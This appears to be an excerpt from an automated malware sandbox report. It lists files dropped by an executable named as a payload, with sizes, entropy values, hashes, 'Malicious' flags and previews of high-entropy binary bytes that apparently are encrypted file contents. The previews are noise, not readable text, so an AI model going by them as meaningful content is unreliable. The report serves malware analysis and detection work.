                                                                                                Preview:<?xml.n...".D.Up.....I..k..)kw....Z....S..)a.E.............a6..S.....V..S......g....W...l(.~.{T...C0.i)?.o<..P3D.<q.......f.Rz.z...`...dM5....h..'.'.1.r<6)i....:v&........E...]...@.I./......I@.rd.yb...........6.P^4...a.....9.{c...S.Q...3.BY.......i.Kf...&.-..N..Q..6.._..3.%...:.L;..rXI.Q.g...=.......A....X26.:.Q%."s....pU.....f2iRng.2..<.........j72^.J.Q...>.......UjZ.py.6..6G.+.......-."..h.0~..=......}.fWm.^.0.R..zOY.9.......y....+@.[QvE.DL({=.8....!...0=......2b|"j....0....&..6.....gf.....n...7......^.h.j...1........W.Z!e.d...M..}..6.,....!...z.b........4.f....H1.0.'....4j....i.A...<.5....e...+....X..8I!..)o..e...?%..?&...b.d.L.zUg......|Dd......-..8g]a8.....na.Q.D..U.3.X]....<B.\.R.........h...Xa..E[..52....?..V....c.SD...o...-&!N..0..I(w[*.+?.^.+.........u..^.._(!K.}Y.|.P.V^..,.6WN....z...'....u.....S..?..Lr_..s.....K....m.....;........B${H...L..u....!.R..hR).+Kf.,s.|..."..."....+._...C.n...]..x.x/...E...!.7.+...5.r.<D).5U...6.cRc..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):783
                                                                                                Entropy (8bit):7.748732705234768
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7aOxMSv8h/wc46EgxTWt0E/CMXCghZHmVwx3bD:+Oxx81w9GPYC98LD
                                                                                                MD5:B702F9659FEAF8E6F9991448FE5AA031
                                                                                                SHA1:DDC54B20097A1C5C392C325303026F35540E9E3E
                                                                                                SHA-256:4D870670DD268A81E1B9D255AC628723BEE4868D9B9EBF84263530F4518B3912
                                                                                                SHA-512:BCC05AFA120040AC9FC795BC74DC9C2F12F145D2DB43A101A9B4651C6534C911CA138C905FBEAF16511B900A95ACE979B1342E7B3638C1B2C33FE17F6184D8BD
                                                                                                Malicious:false
                                                                                                Preview:<?xml.<8D`....BT.7..=.6..wl......p .Di5.....k....%....YKf.^tf.f.s....v..p.Z::...s.Hx.q... ..G...6|....ch....q.^QT.fA.J..M....N]q..2....MU....=..*5L..`Y.~..d.2.V=.:.w....e.=.O....\.)...g(.MsP....Wc...K}?...+2>...u.....&.......ey...2..q.@$.Dvy.....d...Z.Q....{..L....Fj..=*k..../..{..!Hn8...8..B.....o4.s....q.<(_.n..y..K.We(!. s......H..w....Z1"9d......6.......$..J.......N1...r.b.....CB........U.c(.7K~..4mo....Y.o.j&j..4....A..l.!.J@w.^3..2<^G..^.!.l...i. IT2....ag...{....#.vh.d?.D.....-....?c.U...O......+..n.#..P.......3'&...,3z..D.j.,......!....K.0.K.~.K|%.........y)...{.^...T.W.*...A....6...w..S.....+.bEZ.c.a......S......!,5....!..y..sn....=...%.F./........BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2331
                                                                                                Entropy (8bit):7.915945823965042
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:M9mnkPZ/qfUG+GmyAB71c1izPcguVaIpCVT7nIyy0KhXE4LD:6i+ZW+fFd1c1ouVTkTjIyxKZ
                                                                                                MD5:3068C845C5CC21E7DD6765A5D337BC4D
                                                                                                SHA1:9E1E526EEFC52D04751518EE9F9B2A5C68294E92
                                                                                                SHA-256:442331DBB5BEDE71F5E8AD2209AEC532A3D601966A235524A91D0CBE92AA2BD2
                                                                                                SHA-512:CE9B1937B6C1F1BC264A114CB7FA7DC1C93D262B75399CEF96FCEF21756A5FE46A7919C3C38BF76ECCA0A73734A5FADA6426DC0BE4C9F2D742B94C3AC1DE5952
                                                                                                Malicious:false
                                                                                                Preview:<?xml...5..T......O4[e".8....*l.."......F3.^....'...Q..t..n.....K.Q$P.\.9$.Z..5. ..]w..c..k...oI..`8\.al.G0k..7....*..>..BR..&.j=.y.(P3..m.M...Ni.......=C...9..'V.....#`...../~...em...o...U.A.n..0.....Q....D.1J/tG.\*....=R..A8.8..H...U(S.U.."..F>....\....I....A!f<e!..Bzi......H..X.......d:0..b....D.`8.wl..(xUl...ZZ...;...>.q...zV.)H... ....i^..Z..\I/..) .*..]_.q.(7..?..0`..P.d('o....-.[4#..Mz..:.......N..h....7.C.Y...*.Y..mR.-.....Eh.............-.>h+e.b..%>...k....d...+.e.._.....2..U...g.q..=...,..$.6.J..:.....o;.MK......gB...@!J.z.a'.[.{.d....D.X.B.......8..eeOd..|u..f......$R.....b........v.39L.wA'..`..Y,*cO....`.T6:g.9:N..[....6...{U...M.|.!0.#.A#7LFW1...B4...eT...T..;{.O#.>...c.p..Rk.x...A?JwH.:.G.!.K.0..3...b5S.w.{\kS......L.B.D.z.@..`".\.Z`..X..{....+.+.....Z...St..h....V.....`=..!q8...WM.H..Zqgv........~.G-..,Q....0.b..g......._..+.......V1....ma..=$;.0..g..'s.^..r3.~.I.m..`..H.=...[.4].....@. .p...vK......,wb$...4...8.>..y/K.w.&EeU.eB....[..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):44492
                                                                                                Entropy (8bit):7.9960126975744155
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:Y7RzbJHzxYRXO2ojHKRVKlgcymded0Mny7OWgjQyQ2gZzauqJmfNS9OvBA:YtzVVORegxLd0Mny7OUyXQ2uqOS9OpA
                                                                                                MD5:4B490FD3F9520FC99EEE498850BD3DF4
                                                                                                SHA1:EECED639D8708B438CB483681E8491778354096C
                                                                                                SHA-256:E4F4AF1825B3D4669F89918FE06B309F775A292199225C6A1F806A394AD5BB1A
                                                                                                SHA-512:18A54D6A67D0EFC8E02A3732703436584D29B9390883AE76612BA9B12997F7A686BB489BE9466C0956F7EF4078EA047341E99510F4793858E65DCE0D396525A2
                                                                                                Malicious:true
                                                                                                Preview:<?xml....#xlW.g.R~..n?...Z...G..c.,.0F...K...~....1MHU..18.....J.....T...0)WF......g..akc/.7....FG..8.R..U......Xw...].I.n...M-..,.Lb.+.....E.......@.U..?f.5L.:..m}...z....LC...?.........B....\*......,jD...Q}..Gy.....v|..?-i}...T.E...0..wD...E..5'..AbR...+...z.#.T....^..[.R;.......XK.-1.......]t^.......>.u.~.Y+s...y...<.p...).. ...8....m{.y..".\.d..(...$.d.U.|l.8<..;}{U..G..Z[..g..$Z.",...L,..JN......c.YW....Z ....3s.d....0EMh.^.$....x..s._............>vn..J#JYq".)Y....]j/.t....%x.!.`...+{i4c.vD`71..F....F.!.!...j$~p..+..//..8.W$..A.......\.|.)~...w........:l..._.np....3&.........z...l.pNCu.ee...[._..T..a{..6..`....?bz.}...'w..&...^.RZ$(.=.wQ.2.1.M|......Q*..M .$g.g..t.Ap.t>bZz...4...t'.....X.)...G..t.Pp..A{....c.....K..sWH...M..l.V_17.-|..1,sV..{5....W..I.6d.gCz.(V. ..h.x>NZ.(.KBx.....=...H._5].xl?..sPDHXss.Gr....d.b....['......,e...>.Dr.:..j..*...h..X...s.f_!T.x#...0........DM.!/...P~....ErM>Ehv..2.....B..PF|.o7..U.....s.H.`......[.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2338
                                                                                                Entropy (8bit):7.924011795015646
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:tczJlBYFG/GIclfVmTUv8QGAC05oFysZHKHRBB38uLD:tclBJctMTUvNV50hqBBr
                                                                                                MD5:6784A8A4788B781220D3B00480FA68A9
                                                                                                SHA1:67B13EE9C8E8000EFB37FBA444475F9065099D52
                                                                                                SHA-256:40CAF12F28E5C8A6CD845D850A21B96513EFAA03687CDFDCCC02668EA6E7213C
                                                                                                SHA-512:6C74737AD7CB4518C718E7E024A2DD1C07E855982BA368DAA978701F290EF0CB818C56839220C1A10790E967273A7F95D076A741D70CA181CD82BC4FF96B304D
                                                                                                Malicious:false
                                                                                                Preview:<?xmlD....sG.`le...{.O...O.B.O..e.j._......mV.B.B5../..)...xfr.....~,@@........dvL.n...(...].Acj..+OPF$.zX.H?......J.<N[.Y....6...,..2"W.=.\..{.i:?B..R....(..8....>..............tb.Se.(A....WU8.D.9.g.4x"..H..y..&/xU...s.. ...a...EG..Fk..v....J.hc.M.....Yu,>a.._..\...F.p,..{...H.._-\....y.h-...<.9...@x(..9).WW.L./.R....VP#....$....^.v.M.....h...C_..>h.7.?..}H.H*A.i....6..y..i.R8.a....&.41.D3...o.e...L?.D.y.!.........B.^..zh.T.E..kd.O...9.n(....a\Z..r..8....Ew..B^%..-.a.j...MD.......%.....IC.G:.......83.z..n.........w.>.................x.>.>.j..>?..9%..;l.D.Hj.:g.V\.!..0...0v{.[=J2.........7N=.D...0..8..s..S..p....|>......E._s.s.L.....p..DD..... w..l{.R.sA.z.].....Wzoa.A..B.D.~}.PmQy.....;..|...Dv.I.@m.}.s.,..J...$.g..!BV..`...%.p..-...|.CGJ6../..z...}.;F..y..V<.a{...o...>.W.q.rU.P..y9,...a.{:A.L..J.?W..~........*.....S5......p..l..o....Z..0+..>...}...(.t.m..~..l.t...n.Dsr(...PH.....36.r..`{y..A,=A.tY.^L.]p.\..{=P.'m..$.o.+.K..Zl0
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2320
                                                                                                Entropy (8bit):7.91633637537982
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:QIyWuHUQ9egjJBZE/ngZY/a18k43+M92QL+yw6pNTrGF0XIDciCyWAWT/ZUHeMLD:QDVHgg1XE/gZ4k4uM9c+TrGGXVlp7ZUd
                                                                                                MD5:881DE493E167215DB361C008DEA4F428
                                                                                                SHA1:E31462A390E7A4617B6010980C21474FB738CA4A
                                                                                                SHA-256:E5D7E3C79D230970E61BB964E46D4E670B4311035228A8391B4BA776CD972696
                                                                                                SHA-512:6846D2712878B8ED861A94C4BE5813178420E8C67CA95707C2866EE862B2370B046E0CA37677768D9707C04BE3C9F64CB0B379BB0A5BC7BE95FFC8F17190421F
                                                                                                Malicious:false
                                                                                                Preview:<?xmlm+.x..w.....!.v.3oMhF....Q'.../...^.j.......n...s.".....$.%....Uv..=.h.3.......o.<............}..Z3......Cy...NfUr...lb..8d..w(Q.[V.l....@.k..b.UL......P.^.7I.h..a...........{.....+.-e....U.Gw ....4Q....0u.'A.._.....F...wi.ZPM.....;s.x.=....SHZ....9}..... ..T..D.d...!q.:<..o.....x.S.f".....5.....7.......L.....A..{X.r*y#3.~.%.....-6..w..{..2.../.\k2S...G8..g.;A.~..CH..S....X...)...{X.!..a.-0..i.X.Q`.%9.'-..k.M..{GV..H*...X....9.......:..G.T.....-.l&.Q..(...j...WD.XhC.>.K.5...KU.$^.L8...R.........Lp.U{Kl.....u.O...2....W.8..d.s..d.X<..[-8R....RG{.HP...`.|..W..M..|'..m...)...i8I_H#......l....,..9....][CYo..,KdU.....;...3.^.[)...l......4...*..d..f....D.?.......K...":3...Cbv.$...e[<.-$.Y.\...&.x..s1.....z3...o......F.. DjKV.{D..a.L....B9[I.....Y..aY.....n.O.R.;..K....S..O.1u..&..~.......}v.#9,.t....e...... ..C..7k....:....Y.k>....(..A$...y}...*.....Y..0...q*/..Aa....+.Y..Q.....C.<..G;....C.|..f.P.8..........._.rg{........&.B.>....s
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):41208
                                                                                                Entropy (8bit):7.995302988967378
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:CFTPxI0lWqMtMe5euP7cNFQOGbZBnBh+sdSHltM0k43G046C7HzqLzzJQ79JhO:CtPxTWqrepzcbrgTnnRkP/D3G50QhJE
                                                                                                MD5:AC27E2402AE2A92FEC88132120FF4AFC
                                                                                                SHA1:46B9A0E805C56589584DD1148734237AFB75E002
                                                                                                SHA-256:DCAC7C65B50754911BFFC69F781AAFFCA028278584DD44F328DD2793D04AFAD6
                                                                                                SHA-512:48A5697DA012724DF8AD871194740351F08B08E9D74D122FE9A4A42B3801DA4E87E49BBE43F9DB843B2D9E4AD5393BA8E2528C727DEC6D370536D74C00DA5FCF
                                                                                                Malicious:true
                                                                                                Preview:<?xmlI...4.k:.......).....\.;j.Y..T..o~...=Q+Aa1I.a.36.NB9.4..x.....o#[c..HG.e.]>Se..j.. .4.J/.R.~..!.i.umQn..*X1.&S.ll.h.2.~..3t?................b...?t....I..........{l.[*..~A.gC..g..4.>k7+.....x.K..1].^..=.....M2Q..v...UJ......5.. ..n*.4m0Y(.pr.0;6..Pw.pB.z..'..v..E.pc...=b...z..v.i..m...q.&N..9.vJ.....S...k&...\..ji.[.ox$..L...7........B.H.Zz.....=={.H.i........R.j..8...<A..UY...(1....u.{.>..5<...}.R..F.4...M.....18. -#.gA..........N*..E.Z3..-u..D.T"......."......L<._.k.E>..n^8.!s..P.=.dvhq....u..`w[$I....u'.9...fFU..}.....N.s......~.l........v....6.2.<.ot....r...s\rF.].......\......<-..{+z....m.t.+..SS.R..V...p.b.....PAZ@~i.iY.4..."...@b...Te....S...l(|...uh&.^.:.Y.,OBg_..%..f.l...........{...&...=-{.D.....S^^C.c{...4..rT..a.q..c...@Htxw.C.hs......NE._..*.0.Mm.3.S.).)0...(W.q. b..2..\._Q8..`..l.k:wT`..Q..Z.}......=....*xd.-..}.....L.cB...4$v.w..M}\......k1#.._...cG..$.\.,ilr.=.....`....|.Q.p.0Cu.({Y......y...r..I.L......&SF...O.G|N.u..$.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):785
                                                                                                Entropy (8bit):7.711892131723821
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rRD7IR0efPblj2esIUwsnixsPE/nD4Y4Cfx3bD:rRD7ISqDliGT/Dr4OLD
                                                                                                MD5:0FE6949E8D8FB36C6744F5B171306D22
                                                                                                SHA1:E9D026E83D2A5384F197300130C81178596C728E
                                                                                                SHA-256:E1B2FC9A88B448152B1AE9176B1A3DEE4CB8F1D8B5DC73776032624F6C2C2B28
                                                                                                SHA-512:6927B20F9A1523A41973DBB18A1FFAAA2A18DAAB0FE296EBEBDD6CBB8C2823C5B7AD1EF87682F2D3F6C56AC66126E28F00FEF65A992F4E7ADF66CA230B93D6B5
                                                                                                Malicious:false
                                                                                                Preview:<?xml...p.l....o.. if....O...fe..Y|.v...%K$...7..]._...&....b.'...."K]..@.........U$..............1..Ot.?....A..C....|.u..Htx....................xI/...k.b.M.....Y.>.......m.t.u..0.L...y\....p!.,....Q...Z...y..xp..;..2....)5.......7.lnz.....t..h....D...E.s.nk.`}u.4..[/.Q.m..c.8Qu-(u.<..?8..{.0..;....'.ve5c>$..x.....I....5.P.B,mP.n#.g...*...:.f..c.q.....@..J.....?f....b..7KP...h.......U.2p..+...S..4V.w.U..j[.2.iQ7....N.Z.g..=......kvQA...>....Hq...;%:n^........c..>..#.SL...........@C5.ds....E.)OsW..H(.........4*.6...#.V...z.X.......Q2L.HQu-=.. .h.2(0#.b.%CA.^......u@.w..t..=B.w.u.....1-... ..Z...g'.)b.z.........%A.C.....f..b$+. .qH.0X=.].m.C...Q..H.Z./dg..../G.?...yc....p..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.6605348294175535
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:6sEDnSOz95atGpWxRm/BW9KXKo0v3qIyJtZzquI68aU1aXLG5JFAO5+CgJc3ciik:IDSOB5seWxRGWKjIyqPa4EG+EZx3bD
                                                                                                MD5:552135188392AACAE4BEC90A8BA00111
                                                                                                SHA1:22D62A7CF43CCE06089CCB0C3E5190097F6BD25C
                                                                                                SHA-256:42A55B660884A7B9137CB10AB876CC151EDEF1C398E180FAC163ED42842E43D2
                                                                                                SHA-512:B1ACF5C2FB0429C3D1BCB685ADF48C3DDF36F1C744192AD858452FB1A7AAF09E2BA10A81A044AEB68628DE82470A44519372ACB611C78BA6F23912B40F3CC776
                                                                                                Malicious:false
                                                                                                Preview:<?xml.a...6.ae........|.P.D..U.&.z..2...uu! ...-....M..-.4.Z.Np.Ro.a_7...E$#,.7.,....%..a.MkKl.Q6Q.RQ..[w......U.%....................2....L......=..E.uYz1t....K..N.o...A.j&t...~..;..b..q.\..Q....\"...O..`..Q[K..lE....YE.{e)....,.dY<......(...C}.pIg.s.n..Ex]..]...|..w.2.....xm=.>{.q.]..lz*..h.....y...;.2....b..........$s...{7)...p+j..$0.#`W...B_w.V..q"..3.u.t.`q.~.iR...,...*....b..p..D.N.h..}......7......6u..V..3}*..c0.Y.^.'.)|...|.4..l......N..WT.Z.v.37Ua...ic.%q.G@......q..2.....'.2.....S..h.Z..[+}.p.3h..)3x.....Gt.....KZ."..".Ur.t..eA.y.P~}...".r.....Cc'....4#..|...Oua.R.....O...F.e.x,<=[PJ.p......c.:L:.3DX.....n.a. .%.a+_].l..LFbBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1428
                                                                                                Entropy (8bit):7.841868386858083
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wLfMHoWX16VNWKT85tkoskbF/yd/oobWaaoaAKnWrcw+Gjax3bD:wLUNXE6s85ao5yd/SaaoaAKnWB+DLD
                                                                                                MD5:86E0F13344B82FF2D9127ADDAE9256ED
                                                                                                SHA1:969409831F188FB27E6570D6F6D3B6582CA7A050
                                                                                                SHA-256:E6A60350835E4923AA3465A3EEFD65DDD2E52BE6356CCDA904B15855545DAD6D
                                                                                                SHA-512:E5941ABC56D1FAEADAC537462FB5B9AE846AEC5776DEE9E51EE98B06B15A1565EA49FAF3846BD320BC5C74EF2359B8999927F6CFCD5AACA305AE9E4CC1053533
                                                                                                Malicious:false
                                                                                                Preview:<?xml..fk..S(.x.*H1#L..1F..HqVP...a.ys.2......!......{7..,.x`......c..f.....-..V.....j.v......F....q&[....*..B......~_l..4S..6.>#..X.[...Z...vb6..)..X.:...x..G2..#$...~.f.......\b.. ..S'...c='#...o[...i..~R.d*-y.3+s..3.v...7..".G.NIq:..@F.....y.9..m.u..iQ).?V..h..U.....Vu...%.m......*.n\n9._....J....pF..6...X.n./....i..x...$:.*l."]...\o`%k>...aEV`~g.t...E.Q........7%..X...q...6.sv.tv..U.U..y..@&vw.5~...X.4...Q..]..dpM&!.jD.o..A..u|Q.X....UXE...&.1.W...1.*..W\H.....?..._=.K.f.........J.l.G.....=....v^......B....X.n......._0.S.k....L...5...-0AV..._.9:....b..\4C.....K....@.U.qh.B.yU.w..Y6..-....u+.[..e..]4....1.. ..w..%_t...z.}.p\...I/M`?....A.b).......kf.L..."}O..,..|..(8.c.R..%... .....m.[0.....?..lw..Oxz..c...1...*......<S.Mp...."...C.....p.X+{.?.L.d.]X............n.Y.G.:...Uv-..b.3[R!w...Y.o...u}.9nWs7.D.L2wYN.Vs.......".....5.^..O.R.m4.%c%....s.j.J.f.....1....Y..+....k.L..7..n.>.m.x...`.<...J...........w,4J"..k.....-@R...t.lE</.R.Y
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):978
                                                                                                Entropy (8bit):7.762754594782078
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:3PS4cUDOkZqqIt+hf8T9OkMojrXV0pm0iNE9egn9x3bD:fvDPZ/E1T9OkM2zA3iNs3LD
                                                                                                MD5:073645D0D6BD9C789D63821003CAAE7F
                                                                                                SHA1:A111BEBE91EC0CFEF329206C2AED933B0FC6D8E4
                                                                                                SHA-256:E09D9CDBC898237A1277EE0475168F6034E367757AEEB3EED4A9E13285C49446
                                                                                                SHA-512:B69FC1ECCAD258C5E2BBAE704B0E77C1F73B1AD2C96406E526FD4033436B9CB7AFE99E6BDC3803C21F6ED80B83A7C6AFA1E6B12C0F6C39EAE533E92B5FE25F02
                                                                                                Malicious:false
                                                                                                Preview:<?xmlGz......Ep..v.R..%.B09.;%.f...q......i2...?&.<z.....k..K......L.....u&../.....32...\.{......%.........".*eK.^4...3.I.=.O ....Vj.....@..z.$.....-g..q..b.#Ny.;j..Q..'..7..].3..j.o.......A).O2g..g'u...L.C..V.<0J..X.2..i.-L!<".x..+.cg.....t...gi\.....:v6..~ pK<..F.l?..............-G.*..5.C$.jB....%.....,{.s...)n{.....n.1..>..Q....n.L_e....GrRE.+....J.'o-..7gR*IYj.W...YRkSjB.s..!...XVnq.._...P4u...cS.=..."..0XV.......5..$.%Vv..U;.ee.....j,yFO..r).d...tg2..g.9.3Y...q........'g......z.b.\..X*.....f_..}BdH.....1.z...Tt.P/.*t4...`...g..;..!.S>..".1..p...*.::..%.>...}t.....<.U........0}w.L.V.e.(:-..%...,....K........A.i.|..f*:.._..\.hXr..k.S5..r......U.2?Q`....<...n........&j.6.=.1..#.<9...^...G...D._....k.'D'..D....-n7.2.....)....\.....b..ea.'...$[./.D&b.3F.........3_.j.;.b'=........N....}...Pe....@........F..q......_.{.O...]2.N._5.$..L..Yg.D.....mk...[BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1008
                                                                                                Entropy (8bit):7.772163275711957
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:nyMngz50sNuZH5A7KDh0Lx4pJR2q7Ou1ivnjjcyVxSx3bD:nlnUS8s5A7Iow2q7f1InjjcyvmLD
                                                                                                MD5:2B419A708EEA472B0FA1E49A8DAFBA65
                                                                                                SHA1:4F7879718D2A83196E3ACF06998506E4CA0E3C01
                                                                                                SHA-256:4205624AA064CCB93CE50613505E4F909058AE1B6CA60065B1194A4D3BBEA50B
                                                                                                SHA-512:85E80C247D71B922FE78FBA9A475854C6CB0621B6406834CF5E3811C5032FB140F7F088A5D9B077CF8FB37C56CFDB7863DA9B028819937E22B8D02CB4CB8F691
                                                                                                Malicious:false
                                                                                                Preview:<?xmlL_..~......=.$....."..+...)U^....L......4`.HR.:.@3.tID.oi.Z^WP.=+]...I.K.....`..+.v=..<.D.....T6..s...........}..@....$C....;.G.57...}T.d.C.^v.....jh...:...9...i~.[.}S.p..o...u[.Hk..Q.....1.oz...f.d..W.h..q^.v..sv.......1.V.b....`.^O...PG....&.|....E.v.........q..VF.IX.6.W..._j..y... )..!Bf..a9.S.Wv.....X...CLc1.w..L7...J..C..3..y..c.9.].c4g[..w......s.c2dR..AD....D.m.G.q......3.....F&7>.....],.d.P...A/.^..DQ...98|p....-..).bb.n.....l.....S.a..`}0e........4....o0.\.?#6......_D..9.6..yV.7.. .G[u.._-.{-o.v.......*.d{*S.......x.S.hwm.3..X.wK...GleJ...TbZl.....&F.].X.".t{.I....a..6. G.]%.MW..........%g.........+....a....F.~...F..".............Q..$.....o...\H...]l.dm..j..Dn....hX.V....f.>..v..3..X|.}......9D......j.oR.w..^........Z..-.<...e........<.<U.AkF.v..o..g..^...y...0t.H...#..W%T..C.)~..StH.......7_kw.....:.BG.Ei\.....o"p......n..f...-^..DX"...2..&..J0;..iBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1028
                                                                                                Entropy (8bit):7.7979255707125406
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:g6f4vWvzHg4LUj7k5WcXQq4N5y+IC2HcXT5XFL3Zix3bD:Lf4AzHpCCxX+uk2gdFcLD
                                                                                                MD5:B541E8F093C50B73978A337211375ECB
                                                                                                SHA1:FA5CF88442F5B40E35DF6855DD090879E4CA06C5
                                                                                                SHA-256:FD9F74977B1A428E668FFDBB490A7B02A33B0CDB091ABF0FE6CF3C45B0F56DE7
                                                                                                SHA-512:FCE3E93942F8C1BE8190ADECB2FCC6137086BE02F3304DA335938230AA152FA441AEAED76FDE8798B46358817BCA733CE77EFF038301171779D18C4D6922767D
                                                                                                Malicious:false
                                                                                                Preview:<?xml`!..z...P.... .xpU+.e.*..0..e.h.W..<r..o.Y.a.[d6.........3.|..z.Qn(..ob.."c..S..J_+....j..np...b....V.7....l..*.OD.#......G.I...G:.Q.5.r..WO..u.j...o!.l.uP.#.)"..l.b.$.~....@.R.D./...<....6..SL....gq.......E%Y...9#~.$:.5..n.p..!.....z".#.3.j...`,....>...N?..*L.;..`$...m..h.....l...m.-...Z#...iaif.Q.~.s....B.........l......s.$=. ...l....X_...g.......i....h.6.K^.S0vk..4lNx\E..T..Hx.B8...S............|...,(..B..[..e{..o....$t.?oL%.f..Y.............E....E....Q....fT...s.11.|......#..VM.7........}.P....>.^_.F.H..R.k.....Yq.9.y.Zu..3....B.yf.....Pa..-o.F2.D.k&..JQUM..?c..?.*&..S............T.? M.kI..j.l.\L.9.$n..T.......;.Y.../.. .......].v.+.............z.....5SE..J}...'.sH.%.X......J.hU...}.;.....4)..5c.9A.-.E.m..F......$...f....F...OG....w.......Up].......s...T....iT.2......ny.^...U..2..ja.wC8...2....p......M..V.9.._....}..*{z..p.-...G...n..e4aa....h.N<..q0M.SsL...l..h}.K-.6d:.....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1453
                                                                                                Entropy (8bit):7.872411527540783
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:LWn8rOvwt6CuyO5TRBUP3ow2I1eqeH/uun2TmYGVrgk/I58uPkRtWz8OmBs2bsHm:L36CuD5TRmPVeqeH/uMQocGluOtWQDWQ
                                                                                                MD5:65D62E47EA792BBC1D3D61481A34D037
                                                                                                SHA1:5B4FA3E786EC95D3B1D1DC7E25FB6D9DFD2D6B97
                                                                                                SHA-256:7E04631C709F0C4064D52D62E65A4B41F37B3257BDE128D9403BD9B75EF0DFE9
                                                                                                SHA-512:1523C307FECE877356E2805472B693FA2E1D31479181B53DECBE90FA0F5CABA00EBD62722A419C9C70E9AC62B5FE8973E5851B8A6D5D2D24BD8C1841AEF80E2F
                                                                                                Malicious:false
                                                                                                Preview:<?xml....#.El..:.!Q4..G..nQX.1:...E.T.<y.Z...]..q.).k"..Y...$.>....C.i..V.|mz.Y.2..{.@Z...3..C.Tn....P....3..X...\.s...=....a7.4..9>.!)...b..d...m.q`b....e...o.44]..D.%.....:......m5S.F6...X.....y..M......*..:.m.a..P......Lj..Ip_U.).gI..K...M..........).6.)G"..zh.....u.U.@..2.B.n.SR.../..PH....$.!c....Y....Vb<O..&...........|. .Fg.]..\/R......=..y@..@F5i.V.l..|.a..p.......v.N.O....9....h7.......m......gkTq._.:.....aa$.|.^V...8....?F......8.3.....c.....cx....].P...yU.M..tU....)...T.#."]l...`....P..d..E.j.....<..$...ZF\.~...}k.r...9.p..PY.u....XS.....}.;=.V.-...s....]\..;-.....mf.5L...i./I..a...l?....;...w.vV.@z1.?.FL.g....VJ.;....n0].Z..N.Zu.....~...[.R.'K.....L.....D..9....%p.\G.<.w..4N.W..Z....;.v..g.<..N.{.H;^.r.M.WA.....w.8.a.......y..K.n.]..z}...3...tOM....j../(....\.u..V*s.O...w.|.....Q........pxD.3e.e^....:DNb.{T.w.,.>.......r&..-.....VD#."...b..DT...n. ...0..k5>p.X.}uo.l........{..lq...H.T...I%..$.uU<~..ekD..jZ..d...y...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1388
                                                                                                Entropy (8bit):7.862989603622503
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:K7wPK1t3o84c94kC/xHEK5RvgtdUPSe08f9YkInif7uRWhHs9n9x3bD:Kx1t3o84t51gvdCOniaYhHs3LD
